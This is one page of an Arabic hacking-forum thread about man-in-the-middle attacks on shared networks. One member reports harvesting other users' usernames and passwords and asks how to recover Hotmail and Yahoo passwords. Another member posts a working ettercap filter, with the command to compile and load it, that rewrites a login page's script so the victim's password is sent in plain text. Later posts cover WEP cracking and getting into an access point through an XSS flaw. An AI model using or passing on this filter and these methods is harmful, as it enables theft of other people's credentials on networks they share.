صفحة 2 من 3 الأولىالأولى 1 2 3 الأخيرةالأخيرة
النتائج 16 إلى 30 من 32

الموضوع: man in the middle attacking

  1. #16
    عضو برونزي الصورة الرمزية C|EH
    تاريخ التسجيل
    Jun 2005
    المشاركات
    1,951
    معدل تقييم المستوى
    21

    رد: man in the middle attacking

    شكرا لك اخي godfather العملية نجحت معي ، واستطعت الحصول على عدد من الاسماء والباسووردات ولانه الملف اللي جمعته كبير 700 ميجا - صرت حول وانا ابحث رغم اني كنت استعمل البايب وال less وكل شيء ،،

    ولكن مثلا رايت تسجيل دخول على الهوت ميل و الياهو ،، ولكن كانه الباسووردات كانت مشفرة MD5 ،، كيف يتم اظهارها ،،

    والف شكر لك اخي ،، اظن يجب علي استعمال الفلاتر اثناء جمع الباكيج ،،

    اذا ممكن تكتبلي فلتر صغير او معدل لهم اكون شاكرلك
    [SIZE=3][B][CENTER][IMG]https://www.arabhardware.net/forum/signaturepics/sigpic15315_1.gif[/IMG]
    CyberCrime Investigator
    C[COLOR=Red]|[/COLOR]EH - C[COLOR=Red]|[/COLOR]HFI - MCSA - CWSP - CWNA - Netwok+ - MCTS
    Member of International Information Systems Forensics Association[/CENTER]
    [/B][/SIZE]

  2. #17
    عضو
    تاريخ التسجيل
    Jul 2006
    المشاركات
    116
    معدل تقييم المستوى
    0

    مشاركة: man in the middle attacking

    كود:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    
    if (ip.proto == TCP && tcp.src == 80) {
       if (search(DATA.data, "//alert(\x22url=\x22 + url);")) {
          replace("//alert(\x22url=\x22 + url);", "url += \x22&.e=\x22+passwd; "); # note: replacement string is same length as original string
          msg("Sent the passwd in plain-text in '.e'.\n");
       }
    }

  3. #18
    عضو
    تاريخ التسجيل
    Jul 2006
    المشاركات
    116
    معدل تقييم المستوى
    0

    مشاركة: man in the middle attacking

    اولا نعمل كومبلي للفايل فلتر بهذا الامر

    كود:
    etterfilter  file.filter  -o file.ef
    ثم انشغل البرنامج ونعمل كل شي خاص بالهجوم ولكن قبل عمل سنايف اختر الفلتر ثم اعمل سنايف

    وعمل كبجر بولسطة الاثيريل

    وهناك طرق اخرى



    الى اللقاء

  4. #19
    عضو ذهبي الصورة الرمزية The King2
    تاريخ التسجيل
    Nov 2006
    المشاركات
    4,478
    الدولة: Egypt
    معدل تقييم المستوى
    30

    رد: man in the middle attacking

    [CENTER][SIZE=4][FONT=Arial][COLOR=Green]إضغط هنا وإستمتع أثناء تصفحك[/COLOR][/FONT]
    [URL="https://www.tvquran.com/"]The Knigh[/URL] [/SIZE]
    [SIZE=1]PC1
    [/SIZE][/CENTER][CENTER][SIZE=1]GA P55-USB3+ Intel Core I5 750 > Power Coolor 5850 1G DDR5 + Samsung BX2331 23 Inch >
    2*2 G.B CORSAIR DDR3 1333MHZ >
    WD 1T Black aaks >Case C M Elite + Thermaltik Cable Manegment 850 Wat >Sound Card X-FI Xtreem Gamer With Logitech X-530
    PC2
    MSI 770-G45 + Phenom555BE 3.2/7M > ATI Saphire 4770 512 DDr5 + Benq 22 >
    2*2 G.B KingStone DDR3 CL9 1333MHZ >
    Samsung 1 Tera > Case Jumpo With HEC 650 Wat > Phantom 4.1 Model 2003[/SIZE]
    [/CENTER][CENTER][FONT=arial black][SIZE=4] " لا حيلة فى الرزق ولا شفاعة فى الموت "[/SIZE][/FONT]

    [COLOR=#006400][SIZE=4][FONT=arial]كنت هنا دوماً ، ، ، وسأعود يوماً[/FONT][/SIZE][/COLOR]
    [/CENTER]

  5. #20
    عضو
    تاريخ التسجيل
    Sep 2006
    المشاركات
    148
    معدل تقييم المستوى
    0

    مشاركة: man in the middle attacking

    ما شاء الله ..
    صحيح اني ماني متوعب الفكره كامله .. ولكن واضح ان الشرح جيد والدليل الشباب اللي استفادوا منه
    انشالله ف يوم نفهم بعض هذه الامور ونطبقها
    جزاك الله خير اخوي
    pls: pls: pls:
    -------- من مواضيعي --------
    لعبة اساسها محاربة الرب !!!!!
    *************************
    .. خلفيات لجميع أعضـــاء المنتدى ..
    اضغط على الإسم فقط
    -1- Green Flower
    -2- Future

  6. #21
    عضو
    تاريخ التسجيل
    Mar 2006
    المشاركات
    28
    معدل تقييم المستوى
    0

    رد: man in the middle attacking

    شكرا جزيلا اخي الكريم godfather على هذا الموضوع الشيق ولدي بعض الاسئلة وهي اولا هل تنفع هذه الطريقه مع منظومات تستخدم الويب كي كحماية اوليه والمايكروتك كخط حماية ثاني ؟واذا كانت تنفع فهل تنجح مع الاصدارات الحديثه من المايكروتك؟والذي فهمته انك يجب ان تكون متصلا من اجل عمل السنايف ومن ملاحظتي ان هناك اصدار جديد من المايكروتك يعمل على قطع الاتصال عند محاولة السنايف على المنظومه وكذلك عند تشغيل برنامج النت كات --وشكرا مقدما -------اخوك---العراقي

  7. #22
    عضو
    تاريخ التسجيل
    Jun 2006
    المشاركات
    25
    الدولة: Iraq
    معدل تقييم المستوى
    0

    رد: man in the middle attacking

    please mr godfather i want to know step by step to find user and password if
    threr is wepkey and mikrotik firewall and the packet we are use it from airodump or another sniffing files packetes my ask in backtrack please help
    my second question is i have wlan dlink dwl-g520
    in the preveous month i cracked wep key 64-bit in 45 minuts
    but today when i use airodump-ng and aireplay-ng on the same network the ivs not raising i tried several attack but not work note i use aircrack-ng -0.7
    please help
    your brother tgh12 from iraq

  8. #23
    عضو
    تاريخ التسجيل
    Jul 2006
    المشاركات
    116
    معدل تقييم المستوى
    0

    رد: man in the middle attacking

    why people ask . how to hack??!! hmmm

    did you know this the concept . HACK TO LEARN NOT LEARN TO HACK

    did you know some things about security protocols ?, that is maybe used by mikrotik router!hm
    let us assume , you know
    let us talking about those protocols , what those and what the best
    first answer
    1. MAC ACLs
    2. LEAP
    3. EAB-MD5
    4. EAB-SIM
    5.ETC.....MORE

    you can search about details

    second answer , what the best and why ? hmm

    the first three protocols used mutual authentication , than . those can not protect against man-in-the-middle attacks on authentication messages

    so, the best chose , is fourth , it is work like dual-mode phones with SIM cards.

    now , we understood ,what , and why

    let us ask ourself
    is mikrotik administrator has solid background , what and how those protocols work , what is the best chose ?hmm
    if he can install the simulator router that is not mean he understand what he do


    ok


    maybe in next days i write hotspot tutorial


    see you

  9. #24
    عضو
    تاريخ التسجيل
    Mar 2007
    المشاركات
    7
    معدل تقييم المستوى
    0

    رد: man in the middle attacking

    thanks alot god father and we hope that you make an amazing work in bt2 final and tell us about new featuers

  10. #25
    عضو
    تاريخ التسجيل
    Jun 2006
    المشاركات
    25
    الدولة: Iraq
    معدل تقييم المستوى
    0

    رد: man in the middle attacking

    thank you brother
    i hope you specified special toturials on backreack and security specially
    hotspot &ettercap &wireshark &
    how we can modify &change source code of program &compile them explain these programs by text and video to improve our selves and take advantage from your expeirence in knowlege of security and backtrack 2 final
    plese mr godfather dont leave us and support us in toturials
    your brother tgh12 from iraq with thanks

  11. #26
    عضو
    تاريخ التسجيل
    Jan 2007
    المشاركات
    57
    معدل تقييم المستوى
    0

    رد: man in the middle attacking

    أحب الـnetcat

  12. #27
    عضو
    تاريخ التسجيل
    Jun 2006
    المشاركات
    25
    الدولة: Iraq
    معدل تقييم المستوى
    0

    رد: man in the middle attacking

    السلام عليكم اخي العراب شكرا لك على المشاركات الجميلة والمتميزة ونحن اذ نسال عن اليوزر
    نيم والباسورد في man in the middle attack وال microtik ليس لمجرد LEARN TO HACK بل بالعكس تماما لانه وحدة الباك تراك كافي ولكن لانه نريد ان نتعلم ونستفاد من كل الطرق والبرامج
    ولان اللينكس هو اوبن سورس فلذلك لايوجد احتكار للمعلومات لذلك اخي الكريم ارجو الافادة لاننا
    جدد في الباك تراك ولاننا في العراق حيث ان الكهرباء دائمة الانقطاع والظروف بالعراق غير مستقرة وانت على علم بهذا ولاننا نريد ان نعوض مافاتنا من اللينكس وتطبيقاته الهامة ارجو الافادة اخي الكريم مع الشكر والتقدير

  13. #28
    عضو
    تاريخ التسجيل
    Jun 2006
    المشاركات
    25
    الدولة: Iraq
    معدل تقييم المستوى
    0

    Lightbulb رد: man in the middle attacking

    السلام عليكم اخي العراب شكرا لك على المشاركات الجميلة والمتميزة ونحن اذ نسال عن اليوزر
    نيم والباسورد في man in the middle attack وال microtik ليس لمجرد LEARN TO HACK بل بالعكس تماما لانه وحدة الباك تراك كافي ولكن لانه نريد ان نتعلم ونستفاد من كل الطرق والبرامج
    ولان اللينكس هو اوبن سورس فلذلك لايوجد احتكار للمعلومات لذلك اخي الكريم ارجو الافادة لاننا
    جدد في الباك تراك ولاننا في العراق حيث ان الكهرباء دائمة الانقطاع والظروف بالعراق غير مستقرة وانت على علم بهذا ولاننا نريد ان نعوض مافاتنا من اللينكس وتطبيقاته الهامة ارجو الافادة اخي الكريم مع الشكر والتقدير
    !Clap

  14. #29
    عضو
    تاريخ التسجيل
    Jul 2006
    المشاركات
    116
    معدل تقييم المستوى
    0

    رد: man in the middle attacking

    اهلا بيك اخوي العزيز

    بالنسبة للمايكروتك هو سميليتر راوتر يستخدم بكثرة هذه الايام

    كنت في اجابة سابقة قد تكلمت عن بعض البروتوكولات الامنية التي من الممكن استخدامها

    وهناك غيرها من البروتوكولات ولكن على الاغلب المستخدم منها هو

    leap وكذلك eap/md5
    وكذلك ممكن استخدام vpn

    او pptp او pppoE

    اعتفد هذه هي البروتوكلات المستخدمة من قبل البعض
    على فكرة اغلب اصحاب الشبكات الموجودين حالين هم ليس على درايه كاملة بالموضوع اقصد ما يخص السيكيورتي وكذلك اغلبيهم لايهتم بموضوع سرية المعلومات المنتقلة خلال شبكته اقصد ما يخص الزبائن

    الخطوة الاولى هي تحديد البروتكولا المستخدم
    ومن ثم تحديد الهارويرات المستخدمة لان البعض من الاكسس بوينتات تحتوي على هذه البروتوكلات من غير الحاجة الى تثبين سيرفر ريديس او مايكروتك

    فمن الضروري معرفة الهاردوير ومن ثم البحث عن الثغرات في هذا الهاردوير

    على سبيل االمثال لدي صديق يستخدم اكسس بوينت بالامكان استخدام احد البروتوكلات اعلاه من خلالها
    وكن نعمل نبحث عن ثغرة لهذه الاكسس وبالفعل وجدنا ثغرة XSS

    وقمنا بكتابة السيكريبت ومن ثم الدخول على الاكسس بدون معرف اليوزر والباس تبع الاكسس

    اقصد الدخول على الاكسس وليس الشبكة بمعنى اخر انك لاتحتاج الى التخويل من الشبكة حتى تتمكن من الدخول على الاكسس

    وكما تلاحظ اهم موضوع بالعملية هي اكتشاف الثغرة والاداة التي استخدمنها هي NESSUS وهي اداة شهيرة

    بالنسبة لبعض البروتوكلات انا كاتب موضوع بتكلم عن الثغرة لهذه البرونوكلات وكيفية استغلالها في هذا المنتدى
    ممكن تشاهد هذا الصفحة

    https://www.arabhardware.net/forum/s...highlight=pptp

    وبالنسبة للكهرباء ما اعرف شنو دخلها بالموضوع ان كانت الكهرباء سيئة فهذا بسبب المتخلفين الذين يديرون منظومة الكهرباء


    الى اللقا ء

  15. #30
    عضو
    تاريخ التسجيل
    Jun 2006
    المشاركات
    25
    الدولة: Iraq
    معدل تقييم المستوى
    0

    رد: man in the middle attacking

    الف رحمة على والديك اخي العزيز godfather وشكرا على المعلومات القيمة وهذا من كرم اخلاقك
    اخوك tgh12
    !Clap

صفحة 2 من 3 الأولىالأولى 1 2 3 الأخيرةالأخيرة

المواضيع المتشابهه

  1. شرح مبسط لل Router Spoofing و اساليب Man in the Middle
    بواسطة smart_engineer في المنتدى الأرشيف
    مشاركات: 1
    آخر مشاركة: 22-06-2013, 15:01
  2. microsoft Tech·Ed Middle East 2011 Dubai
    بواسطة one-zero في المنتدى الأرشيف
    مشاركات: 1
    آخر مشاركة: 05-03-2011, 15:53
  3. ايهما افضل...‏Dark Fleet DF-30 or thermal take armor+ MX Middle Tower
    بواسطة ضي القمر2 في المنتدى الأرشيف
    مشاركات: 1
    آخر مشاركة: 27-12-2010, 15:14

الكلمات الدلالية لهذا الموضوع

المفضلات

ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •